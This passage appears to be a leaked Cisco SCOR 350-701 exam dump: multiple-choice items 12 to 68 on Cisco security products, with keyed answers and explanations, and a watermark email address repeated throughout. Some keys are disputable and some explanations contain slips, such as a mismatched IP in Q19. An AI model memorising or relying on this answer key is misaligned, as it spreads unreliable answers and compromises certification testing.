D. Cisco Stealthwatch

Answer: D

Question 12

An email administrator is setting up a new Cisco ESA. The administrator wants to enable the blocking of
greymail for the end user. Which feature must the administrator enable first?

A. IP Reputation Filtering
B. Anti-Virus Filtering
C. File Analysis
D. Intelligent Multi-Scan

Answer: D

Explanation

For graymail detection, anti-spam scanning must be enabled globally. This can be either the IronPort Anti-
Spam, the Intelligent Multi-Scan feature, or Outbreak Filters.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa12-
0/user_guide/b_ESA_Admin_Guide_12_0/b_ESA_Admin_Guide_chapter_01101.html

Question 13

Drag and drop the exploits from the left onto the type of security vulnerability on the right.
willsonliam55@gmail.com Skype Apple Kid

Answer:

path transversal: gives unauthorized access to web server files


cross-site request forgery: makes the client the target of attack
SQL injection: accesses or modifies application data
buffer overflow: causes memory access errors

Explanation

The directory traversal/path traversal attack (also known as dot dot slash attack) is an HTTP exploit that
allows an attacker to access restricted files, directories and commands that reside outside the web server’s
root directory.

Question 14

Which technology provides the benefit of Layer 3 through Layer 7 innovative deep packet inspection,
enabling the platform to identify and output various applications within the network traffic flows?

A. Cisco ASAv
B. Cisco Prime Infrastructure
C. Cisco NBAR2
D. Account on Resolution

Answer: C

Explanation

Operating on Cisco IOS and Cisco IOS XE, NBAR2 utilizes innovative deep packet inspection (DPI)
technology to identify a wide variety of applications within the network traffic flow, using L3 to L7 data.

Reference: https://www.cisco.com/c/en/us/td/docs/ios/solutions_docs/avc/guide/avc-user-
guide/avc_tech_overview.pdf

Question 15

An organization must add new firewalls to its infrastructure and wants to use Cisco ASA or Cisco FTD. The
chosen firewalls must provide methods of blocking traffic that include offering the user the option to
bypass the block for certain sites after displaying a warning page and to reset the connection. Which
solution should the organization choose?

A. Cisco ASA because it has an additional module that can be installed to provide multiple blocking
capabilities, whereas Cisco FTD does not.
B. Cisco FTD because it enables interactive blocking and blocking with reset natively, whereas Cisco ASA
does not.
C. Cisco FTD because it supports system rate level traffic blocking, whereas Cisco ASA does not.
D. Cisco ASA because it allows for interactive blocking and blocking with reset to be configured via the
GUI, whereas Cisco FTD does not.

Answer: B

Explanation

Firepower Management Center Configuration Guide



Interactive Block Response Page: Warns users, but also allows them to click a button (or refresh the
page) to load the originally requested site. Users may have to refresh after bypassing the response page
to load page elements that did not load.

Reference: https://www.cisco.com/c/en/us/td/docs/security/firepower/620/configuration/guide/fpmc-
config-guide-v62/http_response_pages_and_interactive_blocking.html

Question 16

An engineer is configuring web filtering for a network using Cisco Umbrella Secure Internet Gateway. The
requirement is that all traffic needs to be filtered. Using the SSL decryption feature, which type of
certificate should be presented to the end-user to accomplish this goal?
willsonliam55@gmail.com Skype Apple Kid

A. third-party
B. SubCA
C. self-signed
D. organization owned root

Answer: D

Explanation

The SSL Decryption feature does require the root certificate be installed.

Reference: https://community.cisco.com/t5/security-blogs/cisco-umbrella-intelligent-proxy-and-ssl-
decryption/ba-p/4453056

Question 17

Which two parameters are used to prevent a data breach in the cloud? (Choose two)

A. encryption
B. complex cloud-based web proxies
C. strong user authentication
D. antispoofing programs
E. DLP solutions

Answer: A C

Explanation

A data breach is a security violation or incident that leads to the theft of sensitive or critical data or its
exposure to an unauthorized party. These incidents can be intentional, such as a database hack, or
accidental, such as an employee emailing confidential files to the wrong recipient.

Two-factor authentication and secure access solutions for cloud apps make it more difficult for
malicious hackers or insiders to compromise users, including those who work remotely or on a contract
basis -> Answer C is correct.

Reference: https://www.cisco.com/c/en/us/products/security/what-is-data-breach.html#~how-to-
prevent-a-breach

In the Data Breaches in Cloud Computing article, encryption is one of the top five methods to prevent data
breach in the cloud -> Answer A is correct.

Question 18

What is the term for when an endpoint is associated to a provisioning WLAN that is shared with guest
access, and the same guest portal is used as the BYOD portal?

A. streamlined access
B. multichannel GUI
C. single-SSID BYOD
D. dual-SSID BYOD

Answer: D

Explanation

If guest access is utilizing one of the named guest account, then same guest portal can be used for
employee BYOD portal. This flow is called Dual-SSID BYOD, where the endpoint is associated to a
provisioning WLAN which is typically shared with guest access.

Reference: https://community.cisco.com/t5/security-documents/ise-byod-dual-vs-single-ssid-
onboarding/ta-p/3641422

Question 19
willsonliam55@gmail.com Skype Apple Kid

What is the function of the crypto isakmp key cisc414685095 address 192.168.50.1
255.255.255.255 command when establishing an IPsec VPN tunnel?

A. It prevents 192.168.50.1 from connecting to the VPN server.


B. It defines that data destined to 192.168.50.1 is going to be encrypted.
C. It configures the pre-shared authentication key for host 192.168.50.1.
D. It configures the local address for the VPN server 192.168.50.1.

Answer: C

Explanation

Note:
+ “address 192.168.60.1 255.255.255.255” means remote peer is host 192.168.50.1
+ The Phase 1 password is “cisc414685095”.

Question 20

Which CLI command is used to enable URL filtering support for shortened URLs on the Cisco ESA?

A. outbreakconfig
B. websecurityadvancedconfig
C. webadvancedconfig
D. websecurityconfig

Answer: B

Explanation

Enabling URL filtering support for shortened URLs is able to be done by CLI only, using
websecurityadvancedconfig

Reference: https://www.cisco.com/c/en/us/support/docs/security/email-security-appliance/118775-
technote-esa-00.html

Question 21

Which Cisco ASA deployment model is used to filter traffic between hosts in the same IP subnet using
higher-level protocols without readdressing the network?

A. single context mode


B. routed mode
C. transparent mode
D. multiple context mode

Answer: C

Explanation

An ASA Firewall is capable of operating at Layer 2 when running in transparent mode. Ability to filter traffic
between hosts using higher-level protocols (e.g. IP addressing and ports) without readdressing the
network.

Reference: https://grumpy-networkers-
journal.readthedocs.io/en/latest/VENDOR/CISCO/FIREWALL/ASA/TRANSPARENTFW.html

Question 22

Which open source tool does Cisco use to create graphical visualizations of network telemetry on Cisco IOS
XE devices?

A. SNMP
B. Splunk
willsonliam55@gmail.com Skype Apple Kid

C. Grafana
D. InfluxDB

Answer: C

Explanation

Visualization with Grafana


Grafana is the visualization engine that is used to display the telemetry data.

Reference: https://blogs.cisco.com/developer/getting-started-with-model-driven-telemetry

Note: InfluxDB is used to store the telemetry data.

Question 23

Which Cisco DNA Center Intent API action is used to retrieve the number of devices known to a DNA
Center?

A. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-device/count
B. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-
device/startIndex/recordsToReturn
C. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-device
D. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-
device?parameter1=value&parameter2=value&…

Answer: A

Explanation

Once the developer has the token, it is possible to get the network devices count.

DEVICES_COUNT_URL = '/dna/intent/api/v1/network-device/count'
response = requests.get(BASE_URL + DEVICES_COUNT_URL, headers = headers, verify=False)
print(response.json())

Reference: https://developer.cisco.com/docs/dna-center/#!devices/devices-api

Question 24

When NetFlow is applied to an interface, which component creates the flow monitor cache that is used to
collect traffic based on the key and nonkey fields in the configured record?

A. flow sampler
B. flow exporter
C. records
D. flow monitor

Answer: D

Explanation

The Netflow flow monitor component is used to provide the actual traffic monitoring on a configured
interface. When a flow monitor is applied to an interface, a flow monitor cache is created that is used to
collect the traffic based on the key and nonkey fields in the configured record.

Reference: https://www.ciscopress.com/articles/article.asp?p=1730890

Question 25

Refer to the exhibit.

ASA# show service-policy sfr


willsonliam55@gmail.com Skype Apple Kid

Global policy:
Service-policy: global_policy
Class-map: SFR
SFR: card status Up, mode fail-open monitor-only
packet input 0, packet output 44715478687, drop 0, reset-drop 0

What are two indications of the Cisco Firepower Services Module configuration? (Choose two)

A. The module is operating in IPS mode.


B. The module fails to receive redirected traffic.
C. Traffic is blocked if the module fails.
D. Traffic continues to flow if the module fails.
E. The module is operating in IDS mode.

Answer: D E

Explanation

In a passive deployment, a copy of the traffic is sent to the SFR service module, but it is not returned to
the ASA. Passive mode allows you to view the actions that the SFR module would have completed in
regards to the traffic. It also allows you to evaluate the content of the traffic, without an impact to the
network.

If you want to configure the SFR module in passive mode, use the monitor-only keyword. If you do not
include the keyword, the traffic is sent in inline mode.

ciscoasa(config-pmap-c)# sfr fail-open monitor-only

Reference: https://www.cisco.com/c/en/us/support/docs/security/asa-firepower-services/118644-
configure-firepower-00.html

-> This SFR module is configured in passive mode (monitor-only)-> Answer E is correct.

In monitor-only mode, the input counters remain at zero. -> Answer B is not correct.

The Cisco ASA 5500 security appliance is not just a plain firewall. With an add-on security module (AIP-
SSM), you can transform the ASA 5500 into an IDS/IPS sensor as well.

The Sensor operates in either “Promiscuous Mode” (IDS functionality) or “Inline Mode” (IPS functionality).

In Promiscuous Mode, the sensor does not intervene in traffic flow, but just “sniffs” the traffic that passes
through the firewall and takes appropriate actions in the event of an attack -> This module is operating in
IDS mode.

Reference: https://www.networkstraining.com/cisco-ids-ips-module-for-cisco-asa-firewalls-aip-ssm/

Question 26

Why is it important for the organization to have an endpoint patching strategy?

A. so the organization can identify endpoint vulnerabilities


B. so the network administrator is notified when an existing bug is encountered
C. so the internal PSIRT organization is aware of the latest bugs
D. so the latest security fixes are installed on the endpoints

Answer: A

Question 27

Which system is InfluxDB and Grafana be used on to pull the data and display the visualization
information?
willsonliam55@gmail.com Skype Apple Kid

A. Docker containers
B. Windows Server 2019
C. specialized Cisco Linux system
D. Windows Server 2016

Answer: C

Question 28

Which Cisco ASA Platform mode disables the threat detection features except for Advanced Threat
Statistics?

A. routed
B. multiple context
C. cluster
D. transparent

Answer: B

Explanation

Cisco ASA Threat Detection does not support multiple context mode.

Reference: https://grumpy-networkers-
journal.readthedocs.io/en/latest/VENDOR/CISCO/FIREWALL/ASA/THREATDETECT.html

Question 29

Which two parameters are used for device compliance checks? (Choose two)

A. device operating system version


B. DHCP snooping checks
C. Windows registry values
D. endpoint protection software version
E. DNS integrity checks

Answer: A D

Question 30

A network engineer entered the snmp-server user asmith myv7 auth sha cisco priv aes 256
cisc0414685095 command and needs to send SNMP information to a host at 10.255.255.1. Which
command achieves this goal?

A. snmp-server host inside 10.255.255.1 version 3 asmith


B. snmp-server host inside 10.255.255.1 snmpv3 myv7
C. snmp-server host inside 10.255.255.1 snmpv3 asmith
D. snmp-server host inside 10.255.255.1 version 3 myv7

Answer: A

Explanation

The command snmp-server user asmith myv7 auth sha cisco priv aes 256
cisc0414685095 creates a user name “asmith” and he belongs to group “myv7”. The password for this
user is “cisco” and “cisc0414685095” is the shared secret.

In order to send SNMP information to a remote host, we have to configure the username (not password) in
the “snmp-server host …” command. So the command must include “asmith” as the username. And we
configure SNMPv3 by using keyword “version 3”, not “snmpv3”.

Question 31
willsonliam55@gmail.com Skype Apple Kid

An engineer is configuring Cisco WSA and needs to enable a separated email transfer flow from the
Internet and from the LAN. Which deployment mode must be used to accomplish this goal?

A. two-interface
B. single interface
C. multi-context
D. transparent

Answer: A

Explanation

The Cisco ESA can be deployed in different ways. Similar to the Cisco WSA, the Cisco ESA can be deployed
with a single physical interface to filter email to and from your mail servers or in a two-interface
configuration. When you configure the Cisco ESA with two interfaces, one interface is used for email
transfers to and from the Internet and the other interface is used for email transfers to and from the
internal servers.

Reference: CCNP And CCIE Security Core SCOR 350-701 Official Cert Guide

Question 32

A small organization needs to reduce the VPN bandwidth load on their headend Cisco ASA in order to
ensure that bandwidth is available for VPN users needing access to corporate resources on the 10.0.0.0/24
local HQ network. How is this accomplished without adding additional devices to the network?

A. Configure VPN load balancing to send non-corporate traffic straight to the internet.
B. Use split tunneling to tunnel traffic for the 10.0.0.0/24 network only.
C. Configure VPN load balancing to distribute traffic for the 10.0.0.0/24 network.
D. Use split tunneling to tunnel all traffic except for the 10.0.0.0/24 network.

Answer: B

Question 33

Which benefit does DMVPN provide over GETVPN?

A. DMVPN can be used over the public Internet, and GETVPN requires a private network
B. DMVPN is a tunnel-less VPN, and GETVPN is tunnel-based.
C. DMVPN supports QoS, multicast, and routing, and GETVPN supports only QoS.
D. DMVPN supports non-IP protocols, and GETVPN supports only IP protocols.

Answer: A

Explanation

DMVPN, FlexVPN and GETVPN comparison:


willsonliam55@gmail.com Skype Apple Kid

Note: GETVPN is tunnel-less VPN while DMVPN is tunnel-based.

Question 34

Which system facilitates deploying microsegmentation and multi-tenancy services with a policy-based
container?

A. Docker
B. SDLC
C. Lambda
D. Contiv

Answer: D

Explanation

Contiv is an Open Source Project to deliver Policy-Based container for Networking. The idea behind Contiv
is to make it easier for end users to deploy micro-services in their environments.

Contiv provides a higher level of networking abstraction for microservices. Contiv secures your application
using a rich policy framework. It provides built-in service discovery and service routing for scale out
services.

Reference: http://contiv.ciscolive.com/pod5/Intro/contiv_intro

Question 35

An engineer needs to configure an access control policy rule to always send traffic for inspection without
using the default action. Which action should be configured for this rule?

A. monitor
B. allow
C. trust
D. block

Answer: B

Explanation

Monitor evaluates traffic first. Monitor rules track and log network traffic. The system continues to match
traffic against additional rules to determine whether to permit or deny it. -> Therefore monitor rule still
uses other rules below, including the default action.
willsonliam55@gmail.com Skype Apple Kid

For Allow rule, matching traffic is allowed; however, prohibited files, malware, intrusions, and exploits
within that traffic are detected and blocked. Remaining non-prohibited, non-malicious traffic is allowed to
its destination, though it is still subject to identity requirements and rate limiting. You can configure Allow
rules that perform only file inspection, or only intrusion inspection, or neither.

Reference: https://www.cisco.com/c/en/us/td/docs/security/firepower/610/configuration/guide/fpmc-
config-guide-v61/access_control_rules.html

Question 36

Which two functions does the Cisco Advanced Phishing Protection solution perform in trying to protect from
phishing attacks? (Choose two)

A. uses a static algorithm to determine malicious


B. determines if the email messages are malicious
C. does a real-time user web browsing behavior analysis
D. blocks malicious websites and adds them to a block list
E. provides a defense for on-premises email deployments

Answer: B E

Explanation

Benefits of Cisco Advanced Phishing Protection



+ Provides another layer of defense to more effectively secure your email environment. -> Answer E is
correct
+ Automatically remove malicious emails from the recipient’s inbox and calls out identity deception
techniques to prevent wire fraud or other advanced attacks. -> Answer B is correct.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa13-
5/user_guide/b_ESA_Admin_Guide_13-5/m_advanced_phishing_protection.html

Question 37

What are two things to consider when using PAC files with the Cisco WSA? (Choose two)

A. If the WSA host port is changed, the default port redirects web traffic to the correct port automatically
B. The WSA hosts PAC files on port 6001 by default.
C. PAC files use if-else statements to determine whether to use a proxy or a direct connection for traffic
between the PC and the host.
willsonliam55@gmail.com Skype Apple Kid

D. By default, they direct traffic through a proxy when the PC and the host are on the same subnet
E. The WSA hosts PAC files on port 9001 by default.

Answer: C E

Explanation

By default, the proxy PAC file would be hosted on port 9001. When using WSA to host PAC files, by
default, we need to point the browser to the following location http://WSA_IP:9001/pacfile.pac -> Answer
B is not correct while answer E is correct.

The PAC file checks the local IP subnet address of the PC and then makes a decision based on IF / ELSE
statement/s -> Answer C is correct.

If the default port is changed in the PAC file hosting settings, then we would need to change the port
accordingly in the above URL -> Answer A is not correct.

Reference: https://www.cisco.com/c/en/us/support/docs/security/web-security-appliance/118082-qanda-
wsa-00.html

Question 38

When implementing transparent user identification for single sign-on with Internet Explorer, how is the
redirect hostname configured?

A. as an IP address
B. as a FQDN
C. as a distinguished name
D. as a short host name

Answer: D

Explanation

Configuring Single-Sign-on
Obtaining credentials transparently facilitates a single-sign-on environment. Transparent user identification
is an authentication realm setting.
For Internet Explorer, be sure the Redirect Hostname is the short host name (containing no dots) or the
NetBIOS name rather than a fully qualified domain.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_01001.html

Question 39

What kind of service that user can access to web application that managed, updated, maintained by
service provider?

A. IaC
B. IaaS
C. PaaS
D. SaaS

Answer: D

Question 40

What are two ways a network administrator transparently identifies users using Active Directory on the
Cisco WSA? (Choose two)

A. Create NTLM or Kerberos authentication realm and enable transparent user identification
B. The eDirectory client must be installed on each client workstation
C. Deploy a separate eDirectory server; the client IP address is recorded in this server
D. Create an LDAP authentication realm and disable transparent user identification
E. Deploy a separate Active Directory agent such as Cisco Context Directory Agent
willsonliam55@gmail.com Skype Apple Kid

Answer: A E

Explanation

Transparently identify users with authentication realms – This option is available when one or more
authentication realms are configured to support transparent identification using one of the following
authentication servers:
Active Directory – Create an NTLM or Kerberos authentication realm and enable transparent user
identification. In addition, you must deploy a separate Active Directory agent such as Cisco’s Context
Directory Agent.
LDAP – Create an LDAP authentication realm configured as an eDirectory, and enable transparent user
identification.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_01001.html

Question 41

Which technology limits communication between nodes on the same network segment to individual
applications?

A. serverless infrastructure
B. machine-to-machine firewalling
C. SaaS deployment
D. microsegmentation

Answer: D

Explanation

Micro-segmentation creates secure zones across cloud and data center environments to isolate application
workloads from one another and secure them individually.

Question 42

Which MDM configuration provides scalability?

A. BYOD support without extra appliance or licenses


B. enabling use of device features such as camera use
C. pushing WPA2-Enterprise settings automatically to devices
D. automatic device classification with level 7 fingerprinting

Answer: C

Explanation

Scalable endpoint configuration


Systems Manager also makes it easy to define and deploy network settings like wireless connectivity,
security settings, and remote VPN access to all devices on your network at once. Instead of manually
provisioning devices for network connectivity, or relying on end users to do so, configure settings such as
WPA2-Enterprise in the dashboard, and let the cloud push the settings to end-user devices.
willsonliam55@gmail.com Skype Apple Kid

Reference: https://www.cloudwifiworks.com/Solutions-Mobile-Device-Management.asp

Question 43

Drag and drop the concepts from the left onto the correct descriptions on the right.

Answer: x

BYOD: My Devices portal that allows users to register their device


posture assessment: Results can have a status of compliant or noncompliant
profiling: requires probes to collect attributes of connected endpoints
guest services: sponsor portal that is used to gain access to network resources

Explanation
willsonliam55@gmail.com Skype Apple Kid

Posture assessment includes a set of rules in a security policy that define a series of checks before an
endpoint is granted access to the network. Posture assessment checks include the installation of operating
system patches, host-based firewalls, antivirus and antimalware software, disk encryption, and more.

-> Posture assessment can be compliant or noncompliant.

Cisco Identity Services Engine (Cisco ISE) guest services enable you to provide secure network access to
guests such as visitors, contractors, consultants, and customers.

Sponsor Accounts: Use the Sponsor portal to create temporary accounts for authorized visitors to securely
access your corporate network or the Internet. After creating the guest accounts, you can also use the
Sponsor portal to manage these accounts and provide account details to the guests.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-
4/admin_guide/b_ISE_admin_guide_24/m_ise_guest.html

Question 44

An engineer is configuring device-hardening on a router in order to prevent credentials from being seen if
the router configuration was compromised. Which command should be used?

A. username < username> password <password>


B. username <username> privilege 15 password <password>
C. service password-recovery
D. service password-encryption

Answer: D

Question 45

What are two security benefits of an MDM deployment? (Choose two)

A. distributed software upgrade


B. robust security policy enforcement
C. on-device content management
D. privacy control checks
E. distributed dashboard

Answer: B C

Question 46

Refer to the exhibit.


willsonliam55@gmail.com Skype Apple Kid

The DHCP snooping database resides on router R1, and dynamic ARP inspection is configured only on
switch SW2. Which ports must be configured as untrusted so that dynamic ARP inspection operates
normally?

A. P2 and P3 only
B. P5, P6, and P7 only
C. P1, P2, P3, and P4 only
D. P2, P3, and P6 only

Answer: B

Explanation

In a typical network configuration for DAI, all ports connected to host ports are configured as untrusted,
while all ports connected to switches are configured as trusted. With this configuration, all ARP packets
entering the network from a given switch will have passed the security check.

Configuring interfaces as untrusted when they should be trusted can result in a loss of connectivity.
Configuring interfaces to be trusted when they are actually untrusted leaves a security hole in the
network.

Reference: https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst4500/12-
2/25ew/configuration/guide/conf/dynarp.html

Question 47

Which Cisco platform provides an agentless solution to provide visibility across the network including
encrypted traffic analytics to detect malware in encrypted traffic without the need for decryption?

A. Cisco Advanced Malware Protection


B. Cisco Stealthwatch
C. Cisco Identity Services Engine
D. Cisco AnyConnect

Answer: B

Question 48

A network engineer is tasked with configuring a Cisco ISE server to implement external authentication
against Active Directory. What must be considered about the authentication requirements? (Choose two)

A. RADIUS communication must be permitted between the ISE server and the domain controller
B. The ISE account must be a domain administrator in Active Directory to perform JOIN operations
C. Active Directory only supports user authentication by using MSCHAPv2
D. LDAP communication must be permitted between the ISE server and the domain controller
E. Active Directory supports user and machine authentication by using MSCHAPv2

Answer: D E

Explanation

Cisco ISE supports user and machine authentication and change password against Active Directory using
EAP-FAST and PEAP with an inner method of Microsoft Challenge Handshake Authentication Protocol
version 2 (MS-CHAPv2) and Extensible Authentication Protocol-Generic Token Card (EAP-GTC) -> Answer
C is not correct while answer E is correct.

The Active Directory username that you provide while joining to an Active Directory domain should be
predefined in Active Directory and should have any one of the following permissions:
–Add the workstation to the domain to which you are trying to connect.
–On the computer where the Cisco ISE account was created, establish permissions for creating computer
objects or deleting computer objects before you join Cisco ISE to the domain.
–Permissions for searching users and groups that are required for authentication.
willsonliam55@gmail.com Skype Apple Kid

-> Therefore the ISE account must not be a domain administrator in Active Directory -> Answer B is not
correct.

Reference: https://www.cisco.com/en/US/docs/security/ise/1.0/user_guide/ise10_man_id_stores.html

ISE will use LDAP, KRB, and MSRBC to communicate with AD during the join/leave and authentication
process -> Answer D is correct.

Reference: https://www.cisco.com/c/en/us/support/docs/security/identity-services-engine/215233-
identity-service-engine-ise-and-active.html

Question 49

Which CoA response code is sent if an authorization state is changed successfully on a Cisco IOS device?

A. CoA-ACK
B. CoA-NAK
C. CoA-MAB
D. CoA-NCL

Answer: A

Explanation

If an authorization state is changed successfully, a positive acknowledgment (ACK) is sent.

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_aaa/configuration/15-sy/sec-usr-
aaa-15-sy-book/sec-rad-coa.html

Question 50

What is a feature of container orchestration?

A. ability to deploy Amazon ECS clusters by using the Cisco Container Platform data plane
B. ability to deploy Kubernetes clusters in air-gapped sites
C. ability to deploy Amazon EKS clusters by using the Cisco Container Platform data plane
D. automated daily updates

Answer: B

Explanation

The ability to deploy Kubernetes clusters in air-gapped sites


Cisco Container Platform (CCP) tenant images contain all the necessary binaries and don’t need internet
access to function.

Reference: https://www.cisco.com/c/en/us/products/cloud-systems-management/container-
platform/index.html#~stickynav=3

Question 51

Which metric is used by the monitoring agent to collect and output packet loss and jitter information?

A. WSAv performance
B. AVC performance
C. RTP performance
D. OTCP performance

Answer: C

Explanation

The monitoring agent collects:


– TCP performance metrics such as bandwidth usage, response time, and latency.
– RTP performance metrics such as packet loss and jitter.
willsonliam55@gmail.com Skype Apple Kid

Reference: https://www.cisco.com/c/en/us/td/docs/ios/solutions_docs/avc/ios15-4-3T-ios-xe3-13/avc-
user-guide-ios15-4-3T-ios-xe3-13.pdf

Question 52

Which solution for remote workers enables protection, detection, and response on the endpoint against
known and unknown threats?

A. Cisco AMP for Endpoints


B. Cisco AnyConnect
C. Cisco Umbrella
D. Cisco Duo

Answer: A

Question 53

Which two components do southbound APIs use to communicate with downstream devices? (Choose two)

A. services running over the network


B. external application APIs
C. OpenFlow
D. applications running over the network
E. OpFlex

Answer: C E

Question 54

Which solution detects threats across a private network, public clouds, and encrypted traffic?

A. Cisco Stealthwatch
B. Cisco CTA
C. Cisco Encrypted Traffic Analytics
D. Cisco Umbrella

Answer: A

Explanation

Stealthwatch provides a consistent experience for detecting threats across private networks and multiple-
public clouds such as Microsoft Azure, Amazon Web Services, and Google Public Cloud. Stealthwatch
closely monitors the activity of every device on the network and is able to create a baseline of normal
behavior. Stealthwatch automatically normalizes traffic events gathered natively from your network
telemetry and natively from flow logs generated by your cloud infrastructure, presents with you a single
view of the threats across your entire environment.

Reference: https://blogs.cisco.com/security/cisco-stealthwatch-becomes-the-only-security-analytics-
product-to-detect-threats-across-private-networks-public-clouds-and-encrypted-traffic

Question 55

What limits communication between applications or containers on the same node?

A. microservicing
B. container orchestration
C. microsegmentation
D. Software-Defined Access

Answer: C

Explanation
willsonliam55@gmail.com Skype Apple Kid

Microservices are about dissecting applications to smaller units and run those units independently
instead of running them in a monolithic application. But this question asks about communication between
applications so “microservicing” is not correct.

Micro-segmentation is a network security technique that isolates different workloads from one another
within a data center. A workload can be broadly defined as the resources and processes needed to run an
application. Hosts, virtual machines and containers are a few examples of workloads.

Question 56

Which Cisco security solution integrates with cloud applications like Dropbox and Office 365 while
protecting data from being exfiltrated?

A. Cisco Talos
B. Cisco Stealthwatch Cloud
C. Cisco Cloudlock
D. Cisco Umbrella Investigate

Answer: C

Question 57

What do tools like Jenkins, Octopus Deploy, and Azure DevOps provide in terms of application and
infrastructure automation?

A. container orchestration
B. cloud application security broker
C. compile-time instrumentation
D. continuous integration and continuous deployment

Answer: D

Question 58

Which type of attack is MFA an effective deterrent for?

A. ping of death
B. phishing
C. teardrop
D. syn flood

Answer: B

Explanation

what types of cyberattacks does MFA protect against?


+ Phishing
+ Spear phishing
+ Keyloggers
+ Credential stuffing
+ Brute force and reverse brute force attacks
+ Man-in-the-middle (MITM) attacks

Reference: https://www.onelogin.com/learn/mfa-types-of-cyber-attacks

Question 59

An engineer enabled SSL decryption for Cisco Umbrella intelligent proxy and needs to ensure that traffic is
inspected without alerting end-users. Which action accomplishes this goal?

A. Install the Cisco Umbrella root CA onto the user’s device.


B. Modify the user’s browser settings to suppress errors from Cisco Umbrella.
C. Upload the organization root CA to Cisco Umbrella.
D. Restrict access to only websites with trusted third-party signed certificates.
willsonliam55@gmail.com Skype Apple Kid

Answer: A

Explanation

Other features are dependent on SSL Decryption functionality, which requires the Cisco Umbrella root
certificate. Having the SSL Decryption feature improves:
Custom URL Blocking—Required to block the HTTPS version of a URL.

Umbrella’s Block Page and Block Page Bypass features present an SSL certificate to browsers that make
connections to HTTPS sites. This SSL certificate matches the requested site but will be signed by the Cisco
Umbrella certificate authority (CA). If the CA is not trusted by your browser, an error page may be
displayed. Typical errors include “The security certificate presented by this website was not issued by a
trusted certificate authority” (Internet Explorer), “The site’s security certificate is not trusted!” (Google
Chrome) or “This Connection is Untrusted” (Mozilla Firefox). Although the error page is expected, the
message displayed can be confusing and you may wish to prevent it from appearing.
To avoid these error pages, install the Cisco Umbrella root certificate into your browser or the
browsers of your users—if you’re a network admin.

Reference: https://docs.umbrella.com/deployment-umbrella/docs/rebrand-cisco-certificate-import-
information

Question 60

A network engineer has configured a NTP server on a Cisco ASA. The Cisco ASA has IP reachability to the
NTP server and is not filtering any traffic. The show ntp association detail command indicates that the
configured NTP server is unsynchronized and has a stratum of 16. What is the cause of this issue?

A. Resynchronization of NTP is not forced


B. NTP is not configured to use a working server
C. An access list entry for UDP port 123 on the inside interface is missing
D. An access list entry for UDP port 123 on the outside interface is missing

Answer: B

Question 61

Which direction do attackers encode data in DNS requests during exfiltration using DNS tunneling?

A. inbound
B. north-south
C. east-west
D. outbound

Answer: D

Question 62

Which solution should be leveraged for secure access of a CI/CD pipeline?

A. SSL WebVPN
B. remote access client
C. Duo Network Gateway
D. Cisco FTD network gateway

Answer: C

Explanation

Continuous integration/continuous delivery, known as CI/CD, is a set of processes that help software
development teams deliver code changes more frequently and reliably. CI/CD is part of DevOps, which
helps shorten the software development lifecycle.
willsonliam55@gmail.com Skype Apple Kid

Using Cisco Secure Access by Duo will establish user-device trust and highly secure access to applications
to help you identify corporate versus personal devices with easy certificate deployment, block untrusted
endpoints, and give users secure access to internal applications without using VPNs. Furthermore, Duo
Network Gateway provides granular user and endpoint access control to CI/CD applications and
infrastructure over HTTPS, SSH and RDP.

Reference: https://blogs.cisco.com/developer/cloudnativesecurity01

Also from https://www.ciscolive.com/c/dam/r/ciscolive/emea/docs/2020/pdf/R6BGArNQ/TECSEC-2768.pdf

Question 63

Which type of data exfiltration technique encodes data in outbound DNS requests to specific servers and
can be stopped by Cisco Umbrella?

A. DNS tunneling
B. DNS flood attack
C. cache poisoning
D. DNS hijacking

Answer: A

Question 64

Which system performs compliance checks and remote wiping?

A. OTP
B. MDM
C. AMP
D. ISE

Answer: B

Explanation

The MDM service usually offers a “corporate wipe”, which only deletes the vendor’s configuration from the
device (not the whole device). The user can also remove the files. For example, on an iOS device, the user
can go to the Settings > General >Device management window, and click Remove Management. Or the
user can go to the MyDevices portal in Cisco ISE and click Corporate Wipe.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-
4/admin_guide/b_ISE_admin_guide_24/m_ise_interoperability_mdm.html

MDM can also perform periodic compliance check.


willsonliam55@gmail.com Skype Apple Kid

Question 65

Why is it important to patch endpoints consistently?

A. Patching helps to mitigate vulnerabilities.


B. Patching reduces the attack surface of the infrastructure.
C. Patching is required per the vendor contract.
D. Patching allows for creating a honeypot.

Answer: A

Question 66

What are two facts about WSA HTTP proxy configuration with a PAC file? (Choose two)

A. It is defined as a Transparent proxy deployment.


B. In a dual-NIC configuration, the PAC file directs traffic through the two NICs to the proxy.
C. The PAC file, which references the proxy, is deployed to the client web browser.
D. It is defined as an Explicit proxy deployment.
E. It is defined as a Bridge proxy deployment.

Answer: C D

Explanation

A Proxy Auto-Configuration (PAC) file is a JavaScript function that instructs a browser to forward traffic to
a proxy server, instead of directly to the destination server.

PAC files are used to support explicit proxy deployments (-> Answer A and answer E are not correct while
answer D is correct) in which client browsers are explicitly configured to send traffic to the web proxy. The
big advantage of PAC files is that they are usually relatively easy to create and maintain.

When a user initiates a browser session, a request is sent to a Proxy server to download the Proxy Auto-
Configuration (PAC) file to the client PC -> Answer C is correct.

Question 67

How does Cisco Umbrella protect clients when they operate outside of the corporate network?

A. by modifying the registry for DNS lookups


B. by using Active Directory group policies to enforce Cisco Umbrella DNS servers
C. by forcing DNS queries to the corporate name servers
D. by using the Cisco Umbrella roaming client

Answer: D

Explanation

Umbrella Roaming is a cloud-delivered security service for Cisco’s next-generation firewall. It protects your
employees even when they are off the VPN.

Question 68

Which function is included when Cisco AMP is added to web security?

A. multifactor, authentication-based user identity


B. detailed analytics of the unknown file’s behavior
C. phishing detection on emails
D. threat prevention on an infected endpoint

Answer: B

Explanation
willsonliam55@gmail.com Skype Apple Kid

File Sandboxing provides you with the ability to analyze unknown files that are traversing the Cisco Web
Security gateway.

